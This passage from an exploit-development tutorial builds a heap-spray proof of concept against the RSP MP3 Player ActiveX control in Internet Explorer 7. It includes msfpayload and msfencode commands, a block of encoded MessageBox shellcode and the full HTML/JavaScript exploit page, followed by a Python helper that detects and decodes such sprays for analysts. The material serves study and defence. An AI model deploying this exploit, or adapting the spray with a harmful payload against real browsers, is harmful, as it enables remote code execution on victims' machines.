
Shellcode + Game Over

Published 2025-01-03 23:32:54, 5474 characters

First we generate some usable shellcode. Remember to encode the shellcode in JavaScript little-endian format (js_le).

root@bt:~# msfpayload windows/messagebox O

     Name: Windows MessageBox
   Module: payload/windows/messagebox
  Version: 13403
   Platform: Windows
     Arch: x86
Needs Admin: No
 Total size: 270
     Rank: Normal

Provided by:
  corelanc0d3r
  jduck <jduck@metasploit.com>

Basic options:
Name      Current Setting   Required  Description
----      ---------------   --------  -----------
EXITFUNC  process           yes       Exit technique: seh, thread, process, none
ICON      NO                yes       Icon type can be NO, ERROR, INFORMATION, WARNING or QUESTION
TEXT      Hello, from MSF!  yes       Messagebox Text (max 255 chars)
TITLE     MessageBox        yes       Messagebox Title (max 255 chars)

Description:
  Spawns a dialog via MessageBox using a customizable title, text & 
  icon


root@bt:~# msfpayload windows/messagebox text='Oww Snap!' title='b33f' O

     Name: Windows MessageBox
   Module: payload/windows/messagebox
  Version: 13403
   Platform: Windows
     Arch: x86
Needs Admin: No
 Total size: 255
     Rank: Normal

Provided by:
  corelanc0d3r
  jduck <jduck@metasploit.com>

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
ICON      NO               yes       Icon type can be NO, ERROR, INFORMATION, WARNING or QUESTION
TEXT      Oww Snap!        yes       Messagebox Text (max 255 chars)
TITLE     b33f             yes       Messagebox Title (max 255 chars)

Description:
  Spawns a dialog via MessageBox using a customizable title, text & 
  icon


root@bt:~# msfpayload windows/messagebox text='Oww Snap!' title='b33f' R | msfencode -t js_le
[*] x86/shikata_ga_nai succeeded with size 282 (iteration=1)

%u22bb%ua82f%udb56%ud9dd%u2474%u58f4%uc931%u40b1%u5831%u0315%u1558%uc083%ue204%uf6d7%ucd43
%u7dce%u06b0%uafc1%u910a%u9910%ud50f%u2923%u9f5b%uc2cf%u7c2d%u9244%uf7d9%u3b24%u3151%u74e0
%u4b7d%ud2e3%u627c%u04fc%u0f1e%ue36e%u84fb%ud72b%ucf88%u5f9b%u058e%ud550%u5288%uca3c%u8fa9
%u3e23%uc4e3%ub497%u34f2%u35e6%u08c5%u66f4%u49a2%u7070%u866a%u7f75%uf2ab%u4471%u214f%uce51
%ua24e%u14fb%u5e90%udf9d%ueb9e%ubaea%uea82%ub107%u67bf%u2ed6%u3336%ub2fc%u7f28%uc24e%uab83
%u3627%u915a%u375f%u1813%u1573%ubb44%u6574%u4d6b%u9ecf%u302f%u7c17%u4a3c%ua5bb%ubc91%u5a4d
%uc2ea%ue0d8%u551d%u86b6%ue43d%u642e%uc80c%ue2ca%u6705%u8177%udb6d%u6f53%u02e7%u90cd%ucea2
%uac78%u741d%u93d2%u36d3%uc8a5%u14cf%u9141%u66f0%u3a6e%ub957%u9bb0%udb0f%ue883%u2aa9%u8638
%u696a%u1eba%u1971%u78e3%ufa56%u2b8b%u9bf8%ua43b%u2b4b%u14cc%u1a65%u19ba%u95a1%u4033%u7798
%ud011%u258a%u066a%u0a1d%u58c4%u820b

Good. Let's tidy up the final POC, adding some comments and the heap spray we built earlier. The final heap-spray script looks like this:

<!--------------------------------------------------------------------------------
// Exploit: RSP MP3 Player OCX ActiveX Heap Spray                 //
// Author: b33f - http://www.fuzzysecurity.com/                 //
// OS: Tested on XP PRO SP3                           //
// Browser: IE 7.00                               //
// Software: http://www.exploit-db.com/wp-content/themes/exploit/applications/  //
//       16fc339cccdb34dd45af52de8c046d8d-rsp_mp3_ocx_3.2.0_sw.zip      //
//------------------------------------------------------------------------------//
// This exploit was created for Part 8 of my Exploit Development tutorial     //
// series => http://www.fuzzysecurity.com/tutorials/expDev/8.html         //
--------------------------------------------------------------------------------->
 
<html>
  <head>
  <object id="Oops" classid='clsid:3C88113F-8CEC-48DC-A0E5-983EF9458687'></object>
  </head>
  <body>
  <script>
   
  var Shellcode = unescape(
  '%u22bb%ua82f%udb56%ud9dd%u2474%u58f4%uc931%u40b1%u5831%u0315%u1558%uc083%ue204%uf6d7%ucd43'+
  '%u7dce%u06b0%uafc1%u910a%u9910%ud50f%u2923%u9f5b%uc2cf%u7c2d%u9244%uf7d9%u3b24%u3151%u74e0'+
  '%u4b7d%ud2e3%u627c%u04fc%u0f1e%ue36e%u84fb%ud72b%ucf88%u5f9b%u058e%ud550%u5288%uca3c%u8fa9'+
  '%u3e23%uc4e3%ub497%u34f2%u35e6%u08c5%u66f4%u49a2%u7070%u866a%u7f75%uf2ab%u4471%u214f%uce51'+
  '%ua24e%u14fb%u5e90%udf9d%ueb9e%ubaea%uea82%ub107%u67bf%u2ed6%u3336%ub2fc%u7f28%uc24e%uab83'+
  '%u3627%u915a%u375f%u1813%u1573%ubb44%u6574%u4d6b%u9ecf%u302f%u7c17%u4a3c%ua5bb%ubc91%u5a4d'+
  '%uc2ea%ue0d8%u551d%u86b6%ue43d%u642e%uc80c%ue2ca%u6705%u8177%udb6d%u6f53%u02e7%u90cd%ucea2'+
  '%uac78%u741d%u93d2%u36d3%uc8a5%u14cf%u9141%u66f0%u3a6e%ub957%u9bb0%udb0f%ue883%u2aa9%u8638'+
  '%u696a%u1eba%u1971%u78e3%ufa56%u2b8b%u9bf8%ua43b%u2b4b%u14cc%u1a65%u19ba%u95a1%u4033%u7798'+
  '%ud011%u258a%u066a%u0a1d%u58c4%u820b');
  
  var NopSlide = unescape('%u9090%u9090'); 
   
  var headersize = 20;
  var slack = headersize + Shellcode.length;
   
  while (NopSlide.length < slack) NopSlide += NopSlide;
  var filler = NopSlide.substring(0,slack);
  var chunk = NopSlide.substring(0,NopSlide.length - slack);
   
  while (chunk.length + slack < 0x40000) chunk = chunk + chunk + filler;
  var memory = new Array();
  for (i = 0; i < 500; i++){ memory[i] = chunk + Shellcode }
   
  // Trigger crash => EIP = 0x06060606
  pointer='';
  for (counter=0; counter<=1000; counter++) pointer+=unescape("%06");
  Oops.OpenFile(pointer);
   
  </script>
</body>
</html>
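For the analyst who meets a page like the one above in a proxy log or a sandbox, the useful tooling is the reverse of what this tutorial builds: undo the js_le encoding to recover the raw bytes, and flag the spray pattern (a NOP-only blob plus an array filled in a large loop). The following Python helper is an added example, not part of the original tutorial or of Metasploit; the HTML inside it is a constructed sample that mimics the layout above, and all function names are my own.

```python
import re

# Constructed sample in the same shape as the heap-spray page above (not its shellcode).
SAMPLE_HTML = """
<script>
var Shellcode = unescape(
  '%u22bb%ua82f%udb56' +
  '%ud9dd%u2474');
var NopSlide = unescape('%u9090%u9090');
while (NopSlide.length < slack) NopSlide += NopSlide;
var memory = new Array();
for (i = 0; i < 500; i++){ memory[i] = chunk + Shellcode }
</script>
"""

UNIT_RE = re.compile(r"%u([0-9a-fA-F]{4})")
# `var NAME = unescape( ... );`, where the argument may be several '...' + '...' lines.
UNESCAPE_RE = re.compile(r"var\s+(\w+)\s*=\s*unescape\((.*?)\);", re.DOTALL)
# `for (...; i < N; ...) { arr[i] = ...` : the loop that fills the spray array.
SPRAY_LOOP_RE = re.compile(r"for\s*\(.*?<\s*(\d+)\s*;.*?\)\s*\{?\s*\w+\[\w+\]\s*=", re.DOTALL)

def decode_js_le(s: str) -> bytes:
    """Reverse msfencode -t js_le: each %uXXXX is one 16-bit unit that unescape()
    lays out little-endian in memory, so %u22bb becomes the bytes bb 22."""
    out = bytearray()
    for unit in UNIT_RE.findall(s):
        v = int(unit, 16)
        out += bytes((v & 0xFF, v >> 8))
    return bytes(out)

def extract_blobs(html: str) -> dict:
    """Map every `var NAME = unescape(...)` in the page to its decoded bytes."""
    return {name: decode_js_le(body) for name, body in UNESCAPE_RE.findall(html)}

def spray_indicators(html: str) -> dict:
    """Heuristics for the spray pattern used above: a blob made only of 0x90 NOPs
    and an array filled in a loop with a large iteration count."""
    blobs = extract_blobs(html)
    nop_blobs = [n for n, b in blobs.items() if b and set(b) == {0x90}]
    m = SPRAY_LOOP_RE.search(html)
    loop_count = int(m.group(1)) if m else 0
    return {
        "blob_sizes": {n: len(b) for n, b in blobs.items()},
        "nop_blobs": nop_blobs,
        "loop_count": loop_count,
        "suspicious": bool(nop_blobs) and loop_count >= 100,
    }
```

The recovered Shellcode bytes can then be handed to a disassembler; the `bb .. .. .. ..` / `d9 74 24 f4` prefix visible after decoding is the shikata_ga_nai decoder stub that msfencode reported above.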
